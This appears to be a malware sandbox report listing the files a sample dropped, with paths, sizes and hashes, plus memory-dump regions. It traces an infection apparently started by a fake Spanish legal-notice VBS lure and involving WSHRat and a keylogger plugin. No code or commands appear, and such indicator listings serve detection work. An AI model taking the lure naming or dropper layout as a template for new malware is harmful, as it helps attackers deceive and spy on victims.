C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
86ed00bda1bc9f72d1fb6f65b8b8ef26

SHA1
3dc47d92ea8e0af53b5ccdd89378b8e356b83052

SHA256
8b9ae2349c7cb9ecba68035c0fae2bc5f27a2eee585dfe68fa3a2a445867e27a

SHA512
2602507866b92f55d6fa317c6d3ca0af0c1e90da44b21c4e402b9c80cdb6168cb16c9149edcb43c3fc054ec0843ac65954dd9ad3a3a36835a8c41176925ae4c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
a4ce7791606e667e00846f0a51312abe

SHA1
3242aab46e81ba4efdf8fef19be1e0f2c413a1b9

SHA256
734fb1c3d57b986c58e690d4ebf679a8c07f6b16e8f516522f002b40db75d38b

SHA512
f20806a58c332aa330396b199d3297024bf43604cef90bf0663aa253ab6b1a10f76560d91bfe22ab08bed3f324ed1aba47eae1ccbe61145e69de31320c9829a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
0cac5e0b54d17878c023947e9e601b0a

SHA1
34d467ce3fd39d52f251d397fb210a846ad44ce8

SHA256
91b2cb7d0a826b7e0555ee7c51e09e9ab11a2838f3f57bc968d0a0aee703bee6

SHA512
cfde4993185b0e24079e379584c3d35c3cedbaac60bc1a60643e1d90341dceef8ec04af949246c842c3dcd2718f77ea980ff6d7c216ab03e7a1c0e6d18af4fe9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
7e3923160baab9151c3324c0f24d9c9c

SHA1
c84f36b2ac5c4dfef544ed87f83dce04317a8d43

SHA256
1f220df5c4126abd320d3dc82211b5fb19c4af6a2acf7d7b606567ed8686e8fc

SHA512
3e8491ce05fd046108812f8c3ceb3b9b1a54df54814d77490faf3c2b9a18661dfb707a02efd40a61c9c20e65eb543889ab19a0556fafc2b322d59e58dd82a8ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i3wgbzbc.yck.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\asyn-29-10-2024.vbs

Filesize
3.1MB

MD5
9f276ee89095690284464c878f5637bf

SHA1
88155d437355370e2266ddb806ca7dda2decf643

SHA256
19ee0e6498dd0c785f6bc4a04633d215dd27b60876d717b986856af3dbf43ee8

SHA512
0a67afe0eab1dc1d2ebb3d1bf530ac84f1adaa85d4042642eeb60c0889864a4a1c60624d5dd72d795a3030f9be09fff2a5d1b17cb4b28238e978b4b87ba397f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\azul 29-10-2024.vbs

Filesize
3.1MB

MD5
1a4ba62994c964a7b1cefda9744f61b2

SHA1
b621b99333a49bc254ab4c09a9aac91611f30e94

SHA256
70b6747a1f0f1f924503a6df98f14b720a729d3f3e69eb71bce6dd11591d965f

SHA512
21418194ce6e9a6b58d4f0ae60cef84445826e74ef9de66a3e6fc45bebddeb4c65b2d52b2ce6e44c4430909c96e3f23985a217c338a342b1df12807734864c11

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
55B

MD5
62dc402df66c31d850e9e540c6c2e3bf

SHA1
4e2b1e6ab3d2ec035ec8362ec9d1d6f98c8972e6

SHA256
f28eb786c3f7479c1bc9e85556896896c8ef03dcc63c717e76f9081322042956

SHA512
b8406213c26926e3427032cd696a6dc4d8a5c610a2b872a78c80b370ced367d7ad8f86f5f151d55ac60a95f8516eda7e5ef0751a354d2102857fba3f8df4715d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
82KB

MD5
4117aef250262ff5e7ea3f33bf6439ed

SHA1
5c6b4f70bfe9e379f4a56f5f48257951ee4a68b8

SHA256
45c797ddeeb1d71332c7b7b00bcd53820c744b74a34aa3f37d51f53e83443c07

SHA512
1680260bd9ef8ae1ee0b8880d670ebccf916a1ae11c61df8a58d882d28fa68524310ef1adc743eba2ac765f452736b9ba0cc5bb570bc404951982ea65c888976

Download Submit
C:\Users\Admin\AppData\Local\Temp\ncocck.js

Filesize
118KB

MD5
7bcd61399c707fcc794a5171f7a2f44d

SHA1
cf09e81d55dd86dd12df5f9685bba9374db53a8b

SHA256
9bf91dbf99d27b41c073d3931bbbeda14f1ba35fc862b251551b703a2dd26968

SHA512
8adb84d8992d5840d3abbc79a9861e1c3a4d2ccf052c0b4a86157d8e7b9401a7c2efcd61d23c88c95c7c9ee66cf00a19b067f4ef010b198a0867d6cfe97168a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\rencos 29-10-2024.vbs

Filesize
3.1MB

MD5
959d797717d5ec696ae4ee007996a059

SHA1
8f76799fac106acdeaec53d5a2a40ab4f2934145

SHA256
b5f44ce14036be9c5333c0f7e8240644016cac70ce70d03986e75231103ec843

SHA512
22155b8dcf41879f37f8c3b64a61a9c837c5367d2bc6bb311a30fd97ad64a8c1f34decd724ead62b64c97ddb95efe224f07bffc7b0d4eee17f2c12d44d992d44

Download Submit
C:\Users\Admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\user.config

Filesize
1KB

MD5
6adab4c76fc078ab342c1543663b25b8

SHA1
30f33a9d2ef56dfc9e5f8b48ebb38c5e4503e8c3

SHA256
367d9883f14feff7473dd6936c4378e25c1829de2d5e835e767185b8637e5d3a

SHA512
5162d86367bf0b02c123835098f5f141d5c36691e7d211684e9fed4b15185690ea3c8d2406d2432899ca64a58fde4743e640950c62480704bdce855a84131339

Download Submit
C:\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

Download Submit
C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000.uu

Filesize
3KB

MD5
66f5c33128553fbb1af24860a0a86ab4

SHA1
6709b8b8fecc8430fa0320ca522cc0bad7dcd504

SHA256
6f5e4b551fb9dfd0b508afaef914be58ad80ed61e898b513a31a19c422055ed7

SHA512
87b7d25767f2b5d854b8daaf84d52a692579ffed590afd0e7424d5930ebab9b19754ab437429ca9a8196a7c229807660d3040d32f334fbc17f69ab064f1bc066

Download Submit
C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#28102024103000000\NOTIFICACION_DE_DEMANDA#28102024103000000.vbs

Filesize
3.1MB

MD5
fc16a008d48f7b1767e18bc091c382a3

SHA1
eecdc11c3cab7cf82df0f0173caad42e2a53dcb5

SHA256
d716b1192e0e795f102f19b5b99f0917065455391d6f173643a2cb71f18fd37f

SHA512
693279cfaffeb579b29980194fd68f7ec52378855c00c40c591024c95935569d97b39f1e50a9e23405fc87e52a66a27bc8536c6aac61eec11f7bdfb6254267a7

Download Submit
C:\Users\Public\Remove.ps1

Filesize
506B

MD5
9a64016f9ad05a65db1862ff2e30da41

SHA1
0e41b0e5f20418cec6e5db6fd972b6b33474b6a8

SHA256
77366edf66bcfddce01230c562990a240bebd33f21484ee1e9306b9fac1592b5

SHA512
42758258e0085942ea4bd0896b15bc82c99ac29f049b404826306f1ecf1e730a547193ee2f208bff8e851e358deafd32186a6bf080db0246eae916c2c0589fc0

Download Submit
C:\Windows\temp\g24mlp53.inf

Filesize
12KB

MD5
ab9c9d0e65025427cb889bc49395c11d

SHA1
d3941cb506d12c90716171068d2af4ee27816118

SHA256
bd08aa2dc5a16499de91b333978bed9a7df8680018ba4892691589ef165e22e4

SHA512
d743b3cd15c713f9a31d49b836e62f476e75a8ed46c84ee4ce14551fb116f247791e1359bde2ac8fb3f2e343957fd4425805381f63e3b0f17288b05115cdef58

Download Submit
C:\Windows\temp\uxkafbt2.inf

Filesize
12KB

MD5
7e004f142e16a98649aac9fe1763e045

SHA1
b1d405ec917bbeaa2ee07dfe08403a61cb2b864f

SHA256
5ac55ce21798caf9993104bd229a42c9b4ca02514c157309246b829eb860743f

SHA512
c4dc585708b0707bb946b74b910f1cfe5136cb23cdf7021d0ab584bd88ed932ba094e658990428986ec1a295893e368f2c70b22e9951938836339f6955dd41dd

Download Submit
C:\Windows\temp\vt1unydk.inf

Filesize
12KB

MD5
bdfcaf3ebbd35863cd90fb057ebfe684

SHA1
98031d5eb63285428535e9f466b1afe763154637

SHA256
30f5adfa8ce2abc76285036627cb491f822270c8f5425d42a685db6319883026

SHA512
3e41ebe472084271af89eb5ec4f7b09bf44f40ad2e75d4c764d28b7a6cd3db4594cb545ed012c70b214b0337d5bbad8af5dbf3a3fba2c83cd1397af48bf201b8

Download Submit
memory/368-422-0x00000000026F0000-0x000000000271A000-memory.dmp

Filesize
168KB

Download
memory/368-423-0x0000000004CE0000-0x0000000004D36000-memory.dmp

Filesize
344KB

Download
memory/368-421-0x0000000000470000-0x000000000047C000-memory.dmp

Filesize
48KB

Download
memory/1224-136-0x000001B328730000-0x000001B328746000-memory.dmp

Filesize
88KB

Download
memory/1224-158-0x000001B328790000-0x000001B3287A6000-memory.dmp

Filesize
88KB

Download
memory/1660-190-0x000001E3D3470000-0x000001E3D3486000-memory.dmp

Filesize
88KB

Download
memory/1664-484-0x0000000007B20000-0x0000000007B28000-memory.dmp

Filesize
32KB

Download
memory/1664-483-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

Filesize
104KB

Download
memory/1664-482-0x0000000007AF0000-0x0000000007B04000-memory.dmp

Filesize
80KB

Download
memory/1664-481-0x0000000007AE0000-0x0000000007AEE000-memory.dmp

Filesize
56KB

Download
memory/1664-480-0x0000000007AA0000-0x0000000007AB1000-memory.dmp

Filesize
68KB

Download
memory/1664-478-0x0000000007910000-0x000000000791A000-memory.dmp

Filesize
40KB

Download
memory/1664-465-0x0000000007510000-0x0000000007542000-memory.dmp

Filesize
200KB

Download
memory/1664-476-0x00000000074D0000-0x00000000074EE000-memory.dmp

Filesize
120KB

Download
memory/1664-466-0x000000006CAF0000-0x000000006CB3C000-memory.dmp

Filesize
304KB

Download
memory/1664-477-0x00000000077E0000-0x0000000007883000-memory.dmp

Filesize
652KB

Download
memory/2264-327-0x0000000005750000-0x0000000005AA4000-memory.dmp

Filesize
3.3MB

Download
memory/2316-258-0x0000000006CC0000-0x0000000006CDA000-memory.dmp

Filesize
104KB

Download
memory/2316-257-0x0000000006D40000-0x0000000006DD6000-memory.dmp

Filesize
600KB

Download
memory/2316-240-0x0000000002EB0000-0x0000000002EE6000-memory.dmp

Filesize
216KB

Download
memory/2316-241-0x0000000005B20000-0x0000000006148000-memory.dmp

Filesize
6.2MB

Download
memory/2316-242-0x0000000005A10000-0x0000000005A32000-memory.dmp

Filesize
136KB

Download
memory/2316-243-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/2316-252-0x0000000006230000-0x0000000006584000-memory.dmp

Filesize
3.3MB

Download
memory/2316-255-0x00000000067E0000-0x00000000067FE000-memory.dmp

Filesize
120KB

Download
memory/2316-256-0x0000000006870000-0x00000000068BC000-memory.dmp

Filesize
304KB

Download
memory/2316-259-0x0000000006D10000-0x0000000006D32000-memory.dmp

Filesize
136KB

Download
memory/2404-283-0x0000000007940000-0x0000000007FBA000-memory.dmp

Filesize
6.5MB

Download
memory/3956-405-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3956-404-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5040-223-0x0000000007170000-0x0000000007202000-memory.dmp

Filesize
584KB

Download
memory/5040-222-0x0000000006FE0000-0x0000000006FFE000-memory.dmp

Filesize
120KB

Download
memory/5040-178-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/5040-176-0x0000000005E40000-0x0000000005EDC000-memory.dmp

Filesize
624KB

Download
memory/5040-159-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5040-220-0x0000000007040000-0x00000000070B6000-memory.dmp

Filesize
472KB

Download
memory/5040-221-0x00000000060C0000-0x00000000060CE000-memory.dmp

Filesize
56KB

Download
memory/5040-238-0x0000000006F10000-0x0000000006F1C000-memory.dmp

Filesize
48KB

Download
memory/5040-237-0x0000000006D40000-0x0000000006D50000-memory.dmp

Filesize
64KB

Download
memory/5040-177-0x0000000006490000-0x0000000006A34000-memory.dmp

Filesize
5.6MB

Download
memory/5236-363-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/5236-390-0x0000000005430000-0x000000000543A000-memory.dmp

Filesize
40KB

Download
memory/5580-487-0x0000000007620000-0x00000000077D8000-memory.dmp

Filesize
1.7MB

Download
memory/5580-425-0x0000000005680000-0x000000000568C000-memory.dmp

Filesize
48KB

Download
memory/5580-527-0x0000000006860000-0x0000000006870000-memory.dmp

Filesize
64KB

Download
memory/5580-441-0x0000000006AE0000-0x0000000006AEC000-memory.dmp

Filesize
48KB

Download
memory/5580-311-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/5876-513-0x0000000000400000-0x0000000000660000-memory.dmp

Filesize
2.4MB

Download
memory/5940-519-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/5940-525-0x00000000069F0000-0x0000000006A3C000-memory.dmp

Filesize
304KB

Download
memory/6000-98-0x0000028A73580000-0x0000028A735A2000-memory.dmp

Filesize
136KB

Download
memory/6104-437-0x0000000005A80000-0x0000000005DD4000-memory.dmp

Filesize
3.3MB

Download
memory/6104-439-0x0000000006180000-0x00000000061CC000-memory.dmp

Filesize
304KB

Download